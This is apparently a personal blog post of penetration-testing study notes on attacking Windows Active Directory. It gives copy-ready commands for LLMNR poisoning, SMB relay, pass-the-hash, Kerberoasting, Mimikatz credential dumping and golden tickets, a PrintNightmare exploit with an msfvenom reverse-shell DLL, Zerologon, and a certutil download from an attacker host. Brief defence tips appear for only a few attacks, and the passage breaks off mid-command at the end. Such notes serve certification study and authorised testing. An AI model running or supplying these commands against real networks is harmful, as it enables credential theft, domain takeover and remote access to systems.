<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="PNPT Notes" /><meta property="og:locale" content="en" /><meta name="description" content="Active Directory Attacks" /><meta property="og:description" content="Active Directory Attacks" /><link rel="canonical" href="https://ahmedel-rayes.github.io/posts/PNPT/" /><meta property="og:url" content="https://ahmedel-rayes.github.io/posts/PNPT/" /><meta property="og:site_name" content="Anubis-Sec" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-11-06T12:19:00-06:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="PNPT Notes" /><meta name="twitter:site" content="@twitter_username" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-03-07T18:05:47-06:00","datePublished":"2022-11-06T12:19:00-06:00","description":"Active Directory Attacks","headline":"PNPT Notes","mainEntityOfPage":{"@type":"WebPage","@id":"https://ahmedel-rayes.github.io/posts/PNPT/"},"url":"https://ahmedel-rayes.github.io/posts/PNPT/"}</script><title>PNPT Notes | Anubis-Sec</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Anubis-Sec"><meta name="application-name" content="Anubis-Sec"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/assets/img/anubis.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Anubis-Sec</a></div><div class="site-subtitle font-italic">“Ask, and it shall be given you; seek, and ye shall find; knock, and it shall be opened unto you”</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/AhmedEl-Rayes" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['aelrayes00','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="https://www.linkedin.com/in/ahmedelrayes00/" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>PNPT Notes</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>PNPT Notes</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1667758740" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Nov 6, 2022 </em> </span> <span> Updated <em class="" data-ts="1678233947" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Mar 7, 2023 </em> </span><div class="d-flex justify-content-between"> <span> By <em> <a href="https://github.com/AhmedEl-Rayes">Ahmed El-Rayes</a> </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="2123 words"> <em>11 min</em> read</span></div></div></div><div class="post-content"><h1 id="active-directory-attacks">Active Directory Attacks</h1><h2 id="llmnr-poisoning"><span class="mr-2">LLMNR Poisoning</span><a href="#llmnr-poisoning" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Link local multicast name resolution, used when DNS fails to resolve a hostname, can be an easy win if LLMNR is not disabled in the environment and users have weak credentials. Use responder from the impacket suite to listen on an interface, works better at times with high traffic..</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>Python responder.py <span class="nt">-I</span> eth0 <span class="nt">-rdwv</span>
</pre></table></code></div></div><p>If certain events occur, you can obtain a username and NTLM hash, which can be cracked with john or hashcat.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>john <span class="nt">--wordlist</span><span class="o">=</span>/path/to/rockyou.txt /path/to/hash.txt
</pre></table></code></div></div><p>hashcat -m 5600 /path/to/hash.txt /path/to/rockyou.txt (5600 is the module for NTLMv2)</p><p><a href="https://hashcat.net/hashcat/">Hashcat binary</a> can be downloaded here, and should be ran on base OS.</p><h3 id="defending-against-llmnr-attacks"><span class="mr-2">Defending against LLMNR attacks</span><a href="#defending-against-llmnr-attacks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Best defense against this attack is to simply disable LLMNR and NBT-NS, if they can not be disabled then strong access controls and strong passwords should be enforced on the network.</p><h2 id="smb-relay-attacks"><span class="mr-2">SMB Relay Attacks</span><a href="#smb-relay-attacks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Instead of cracking the hash, we can also use it to gain access to a machine if our stolen user hash represents a local admin on the target machine. <strong>SMB signing must be disabled for this to work</strong>.</p><p>Edit the responder.conf file and turn off SMB and HTTP servers, run responder –&gt; responder is only capturing hashes, ntlmrelayx will do the actual relay.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>python ntlmrelayx.py <span class="nt">-tf</span> targets.txt <span class="nt">-smb2support</span>
</pre></table></code></div></div><p>Can dump the SAM file –&gt; get access to local user hashes.</p><p>Add -i argument to get an interactive shell spawned on your machine. “started interacvtive SMB client shell via TCP on localhost:11000” -&gt; use netcat to interract, can view/modify/</p><h3 id="enumerating-hosts-with-smb-signing-disabled"><span class="mr-2">Enumerating hosts with SMB signing disabled</span><a href="#enumerating-hosts-with-smb-signing-disabled" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap <span class="nt">--script</span><span class="o">=</span>smb2-security-mode.nse <span class="nt">-p</span> 445 192.168.1.0/24
</pre></table></code></div></div><p>Disabled by default on workstations, enabled and required by default on servers. enabled but not required = vulnerable.</p><h3 id="defending-against-smb-relay-attacks"><span class="mr-2">Defending against SMB relay attacks</span><a href="#defending-against-smb-relay-attacks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Enable SMB signing on all devices, disable NTLM authentication, account tiering (least priv.), local admin restriction.</p><h2 id="ipv6-attacks"><span class="mr-2">IPv6 Attacks</span><a href="#ipv6-attacks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p><a href="https://github.com/dirkjanm/mitm6">Clone MiTM6</a> and run “pip3 install” in the directory.</p><p>Starting by running</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>mitm6 <span class="nt">-d</span> domain.local
</pre></table></code></div></div><p>and concurrently run</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ntlmrelayx.py <span class="nt">-6</span> <span class="nt">-t</span> ldaps://dc.ip.add.res <span class="nt">-wh</span> fakewpad.domain.local <span class="nt">-l</span> lootme
</pre></table></code></div></div><p>Very extensive tool, can create new users/update ACLs, dump creds, gather info, etc.</p><h1 id="post-compromise-enumeration">Post Compromise Enumeration</h1><h2 id="powerview"><span class="mr-2">PowerView</span><a href="#powerview" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p><a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon">Download</a> on victim machine, and run</p><pre><code class="language-cmd">powershell.exe -ep bypass
.\PowerView.ps1
</code></pre><p>Get-NetDomain - gives general information about the domain, forest name, DCs, etc.</p><p>Get-NetDomainController - gives more specific information about the DCs, IP addresses, names, etc.</p><p>Get-DomainPolicy - can see GPs on the domain, Kerberos, System Access, version,</p><p>(Get-DomainPolicy)”system access” - can see the system access policies: min. password age, password complexity, password length, etc.</p><p>Get-NetUser - dumps info on all users</p><div class="table-wrapper"><table><tbody><tr><td>Get-NetUser<td>select cn - will give users</table></div><div class="table-wrapper"><table><tbody><tr><td>Get-NetUser<td>select samaccountname - will give account names</table></div><p>Get-UserProperty - lists all potential user properties</p><p>Get-UserProperty -Properties pwdlastset - will show when all users had their passwords last reset</p><p>Get-UserProperty -Properties logoncount - can potentially find honeypot accounts with low logon #s</p><p>Get-NetComputer - will list all computers</p><p>Get-NetComputer -FullData - will dump tons of info about all computers</p><div class="table-wrapper"><table><tbody><tr><td>Get-NetComputer -FullData<td>select OperatingSystem - will show all computer operating systems</table></div><p>Get-NetGroup - shows groups</p><p>Get-NetGroup -GroupName “Domain Admins”</p><p>Get-NetGroupMember -GroupName “Domain Admins”</p><p>Invoke-ShareFinder - SMB enum</p><p>Get-NetGPO</p><div class="table-wrapper"><table><tbody><tr><td>Get-NetGPO<td>select displayname, whenchanged</table></div><h2 id="bloodhound"><span class="mr-2">Bloodhound</span><a href="#bloodhound" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Downloads data from AD and displays it in GUI, figures out shortest path to DA.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>apt <span class="nb">install </span>bloodhound<span class="p">;</span>
neo4j console<span class="p">;</span>
bloodhound
</pre></table></code></div></div><p>After changing the default password, you can start pulling data from the environment by <a href="https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors">downloading sharphound</a> on the victim machine.</p><pre><code class="language-cmd">powershell -ep bypass
</code></pre><div class="language-powershell highlighter-rouge"><div class="code-header"> <span data-label-text="Powershell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="o">.</span><span class="n">\SharpHound.ps1</span><span class="w">
</span><span class="nx">Invoke-Bloodhound</span><span class="w"> </span><span class="nt">-CollectionMethod</span><span class="w"> </span><span class="nx">All</span><span class="w"> </span><span class="nt">-Domain</span><span class="w"> </span><span class="nx">Domain.local</span><span class="w"> </span><span class="nt">-ZipFileName</span><span class="w"> </span><span class="nx">file.zip</span><span class="w">
</span></pre></table></code></div></div><p>Transfer the file to attack machine, and upload it to bloodhound.</p><h1 id="post-compromise-attacks">Post Compromise Attacks</h1><h2 id="pass-the-hash--pass"><span class="mr-2">Pass the Hash / Pass</span><a href="#pass-the-hash--pass" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>crackmapexec 10.10.10.0/24 <span class="nt">-u</span> user <span class="nt">-d</span> DOMAIN <span class="nt">-p</span> password
</pre></table></code></div></div><p>Will spray the network with the user’s creds, can be done with the user’s password hash as well.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>crackmapexec smb 10.10.10.0/24 <span class="nt">-u</span> <span class="s2">"user"</span> <span class="nt">-H</span> <span class="nb">hash</span> <span class="nt">--local-auth</span>
or
psexec.py <span class="s2">"user"</span>:@ipaddress <span class="nt">-hashes</span> &lt;<span class="nb">hash</span><span class="o">&gt;</span>
</pre></table></code></div></div><h2 id="dumping-hashes-with-secretsdumppy"><span class="mr-2">Dumping Hashes with secretsdump.py</span><a href="#dumping-hashes-with-secretsdumppy" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>secretsdump.py domain/user:pass@ipaddress
</pre></table></code></div></div><p>can dump SAM hashes, LSA secrets, api keys.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>hashcat64.exe <span class="nt">-m</span> 1000 hashes.txt rockyou.txt
</pre></table></code></div></div><p>-m 1000 is for NTLM</p><h2 id="token-impersonation"><span class="mr-2">Token Impersonation</span><a href="#token-impersonation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>A token is a temporary key that allows you to access a system or network without having to provide creds for every action you take. There are 2 types of tokens:</p><ol><li>Delegate- Created for logging into a machine or using RDP<li>Impersonate- “Non-interactive” such as attaching a network drive or a domain logon script.</ol><p>How to do it with metasploit-</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>msfconsole
use exploit/windows/smb/psexec
<span class="nb">set </span>rhosts &lt;dc ip address&gt;
<span class="nb">set </span>smbdomain &lt;domain.local&gt;
<span class="nb">set </span>smbpass &lt;pass&gt;
<span class="nb">set </span>smbuser &lt;user&gt;
show targets
<span class="nb">set </span>target 2
<span class="nb">set </span>payload windows/x64/meterpreter/reverse_tcp
<span class="nb">set </span>lhost eth0
run
</pre></table></code></div></div><p>If all is good, you’ll be in a shell, lots of tools we can load like mimikatz, powershell, incognito. If a user has logged into the machine, you may be able to impersonate them with their token using incognito.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>load incognito
list_tokens <span class="nt">-u</span>
impersonate_token &lt;domain&gt;<span class="se">\\</span>&lt;user&gt;
shell
</pre></table></code></div></div><p>will place you in a shell as the new user.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>rev2self
</pre></table></code></div></div><p>to revert to your original shell.</p><h2 id="kerberoasting"><span class="mr-2">Kerberoasting</span><a href="#kerberoasting" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>How Kerberos works - suppose a user is attempting to access an application server.</p><ol><li>User requests a TGT (Ticket Granting Ticket) from the domain controller (key distribution center), the KDC verifies the username and NTLM hash.<li>If the credentials are valid, the user receives TGT from the DC, encrypted with the krbtgt hash.<li>The user provides the TGT back to the DC, this time requesting a TGS (Ticket Granting Service Ticket)<li>DC verifies TGT by decrypting with it’s own hash, then sends the user a TGS encrypted with the application server’s hash.<li>User sends the encrypted TGS to the application server, who can decrypt it with it’s own hash and authenticate the user.<li>User and Application server have now mutually authenticated each other <em>securely</em>, good job Microsoft!</ol><p>In short, valid creds -&gt; TGT -&gt; TGS -&gt; access to service</p><p>Instead of using the TGS to authenticate to a server, we can crack the hash and BECOME the server.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>python GetUserSPNs.py domain.local/user:pass <span class="nt">-dc-ip</span> &lt;dc ip&gt; <span class="nt">-request</span>
</pre></table></code></div></div><p>Requests a service ticket and sends you the hash, which can be cracked with hashcat (-m 13100 for krb-TGS). Because we are exploiting a feature of Kerberos, you can not prevent this attack; it can only mitigated with strong passwords (30 characters+ for service accounts) and following the rules of least privilege.</p><h2 id="gpp--cpassword-attacks"><span class="mr-2">GPP / cPassword Attacks</span><a href="#gpp--cpassword-attacks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Group Policy Preferences allowed admins to create policies using embedded credentials. These creds would be encrypted and placed in the “Groups.xml” file, which resides in the SYSVOL folder and can be read by any user. This file will contain the encrypted “cPassword”, which can be decrypted easily using gpp-decrypt (default on Kali). Can use Invoke-GPP to check for this automatically. Always look for this on older servers, could be an easy win.</p><h2 id="url-attacks"><span class="mr-2">URL Attacks</span><a href="#url-attacks" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Need access to a file share to do this, either through a user account (post exploit) or on a wide open share (less likely). Make a file that contains this-</p><div class="language-text highlighter-rouge"><div class="code-header"> <span data-label-text="Text"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\&lt;attackbox IP&gt;\%USERNAME%.icon
IconIndex=1
</pre></table></code></div></div><p>The name of the file is important, it must start with an @ or ~ to ensure that it is placed alphabetically at the top of the directory, and must end with the .url extension. The name should be something relevant to the company - “@Q4 financials.url”. Save as type “all files”. When users navigate to the directory, their hash will be sent over to the attackbox, which can be picked up with a responder listener.</p><h2 id="print-nightmare-cve-2021-1675"><span class="mr-2">Print Nightmare (CVE-2021-1675)</span><a href="#print-nightmare-cve-2021-1675" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Use rpcdump.py from impacket to scan for potentially vulnerable hosts.If it returns a value, it could be vulnerable.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>rpcdump.py @&lt;Victim IP&gt; | egrep <span class="s1">'MS-RPRN|MS-PAR'</span>
</pre></table></code></div></div><p>use msfvenom to generate a payload and msfconsole to set the listener</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>msfvenom <span class="nt">-p</span> windows/x64/windows/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>&lt;listener IP&gt; <span class="nv">LPORT</span><span class="o">=</span>&lt;port&gt; <span class="nt">-f</span> dll <span class="o">&gt;</span> shell.dll
msfconsole
use multi/handler
options
<span class="nb">set </span>payload windows/x64/windows/reverse_tcp
options
<span class="nb">set </span>lport &lt;lport&gt;
<span class="nb">set </span>lhost &lt;listener IP&gt;
run
</pre></table></code></div></div><p>Now we need to host our dll so the target can reach it</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbserver.py share <span class="s1">'pwd'</span> <span class="nt">-smb2support</span>
</pre></table></code></div></div><p>Now we just need a user/pass combination (does not have to be administrator).</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>python3 CVE-2021-1675.py domain.local/&lt;user&gt;:&lt;password&gt;@&lt;dc ip&gt; <span class="s1">'\\&lt;attack box IP&gt;\share\shell.dll'</span> 
</pre></table></code></div></div><p>Should get a meterpreter shell on your listener, can proceed with the usual, getuid, hashdump, etc. Most AV will pick up the shell.dll if you don’t obfuscate it in some way.</p><h2 id="mimikatz"><span class="mr-2">Mimikatz</span><a href="#mimikatz" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>A tool built in C used to steal credentials, generate Krb tickets, and leverage attacks such as pass the hash, pass the ticket, golden ticket, etc. Very extensive tool. Use on DC post compromise.</p><pre><code class="language-cmd">mimikatz.exe
privilege::debug
</code></pre><p>“Privilege ‘20’ OK” -&gt; good to go</p><pre><code class="language-cmd">sekurlsa::logonpasswords
</code></pre><p>Will show computer username/NTLM hash for it, as well as any user who has logged in since last reboot, dumps this information from memory. Can pass the computer’s NTLM hash (not v2) and see if it gives access anywhere on the domain. If a DA has logged into the computer, you can potentially pass their hash or try to crack it.</p><pre><code class="language-cmd">lsadump::sam
or
lsadump::sam /patch
</code></pre><p>Doesn’t always work, can try different ways, metasploit, secretsdump, etc.</p><pre><code class="language-cmd">lsadump::lsa /patch
</code></pre><p>LSA= local security authority, dumping it will show usernames/ntlm hashes.</p><h3 id="golden-ticket-attack-with-mimikatz"><span class="mr-2">Golden Ticket attack with Mimikatz</span><a href="#golden-ticket-attack-with-mimikatz" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Golden ticket = complete access to the <em>ENTIRE</em> domain</p><pre><code class="language-cmd">mimikatz.exe
lsadump::lsa /inject /name:krbtgt
</code></pre><p>Need to grab 2 things from the output:</p><p>S-ID of the domain (looks like S-1-5-32-1045337234-12924708993-5683276719-19000) NTLM hash of the Krbtgt</p><pre><code class="language-cmd">kerberos::golden /User:Administrator /domain:&lt;domain.local&gt; /sid:&lt;SID&gt; /krbtgt:&lt;krbtgt ntlm hash&gt; /id:500 /ptt
</code></pre><p>id 500 is associated with Admin, and /ptt specifies pass the ticket. Output should say “golden ticket for ‘Administrator @ <domain>' successfully submitted for current session"</domain></p><pre><code class="language-cmd">misc::cmd
dir \\&lt;machine&gt;\&lt;drive&gt; jkhdf
or
psexec.exe \\&lt;machine&gt; cmd.exe
</code></pre><p>Golden ticket can be used for persistence as well.</p><h2 id="zero-logon"><span class="mr-2">Zero Logon</span><a href="#zero-logon" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>CVE-2020-1472. Dangerous attack to run in an environment, sets the DC password to null, if you don’t reset the password you can break the server.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>./zerologon_tester.py &lt;DC netbios name&gt; &lt;DC IP&gt;
python3 cve-2020-1472-exploit.py &lt;DC netbios name&gt; &lt;DC IP&gt;
</pre></table></code></div></div><p>Use hexpass and restorepassword.py to restore the DC. Easy attack to pull off, scary in the real world.</p><h2 id="post-exploitation"><span class="mr-2">Post Exploitation</span><a href="#post-exploitation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><h3 id="file-transfers"><span class="mr-2">File Transfers</span><a href="#file-transfers" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Certutil</p><pre><code class="language-cmd">certutil.exe -urlcache -f http://&lt;attackbox IP&gt;/malicious.txt malicious.txt
</code></pre><p>FTP</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>python <span class="nt">-m</span> pyftpdlib 21
ftp &lt;attacker ip&gt;
